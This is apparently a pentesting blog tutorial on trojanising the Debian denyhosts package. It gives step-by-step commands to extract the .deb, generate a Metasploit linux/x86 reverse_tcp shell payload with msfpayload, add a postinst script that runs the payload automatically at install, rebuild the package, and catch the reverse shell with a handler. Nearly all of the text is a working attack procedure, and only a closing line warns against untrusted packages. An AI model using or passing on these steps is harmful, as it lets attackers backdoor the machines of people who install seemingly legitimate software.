First, download the package you are going to infect, for my test case m going to use denyhosts package.Its a simple package to drop ssh attacks. So from console type
apt-get install denyhosts
I then navigate to /var/cache/apt/archives/ on my backtrack4 machine, copy the denyhosts.deb package to another location for modification.On the new location extract the contents of the denyhosts.deb package by typing
dpkg -x denyhosts_2.6-5_all.deb test
This will create a folder called test with the contents of the package.A simple ls reveals the following folders:
etc usr var workdir
Go to msfpayload and generate yor payload. On my backtrack4 ,i prefer the linux/x86/shell/reverse_tcp.so on console,i type the following.
/pentest/exploits/framework3/msfpayload linux/x86/shell/reverse_tcp LHOST= LPORT=4444 X > linux_payload
This creates a payload called linuxpayload in your current directory.
Create a folder called DEBIAN,and in the folder create two files . control and postinst. A simple control file is for defining the package. My control file looks like the one below.
Maintainer: Ubuntu dvelopers
For the postinst file, make the file executable. contents of the postinst file should contain the payload you want to execute and the path the payload will be copied. my postinst file looks like this.
chmod 2755 /usr/share/denyhosts/linux_payload && /usr/share/denyhosts/linux_payload &
For this to work, copy your payload (linux_payload) to the extracted foler (test) and paste in in test/usr/share/denyhosts
now we are ready to build the debian package. From console,type the following
dpkg-deb –build test
It will create a malicious .deb package inside the test folder. Start the explot/multi/handler to handle your sessions. Scp the debian package to another machine and install it with the common dpkg -i [package_name] option. Immediately the package is installed, you should recieve a reverse shell on your machine.
I dont have any rpm based system at the moment but hope somebody tries it out .
Lesson:Dont install packages from people you dont trust.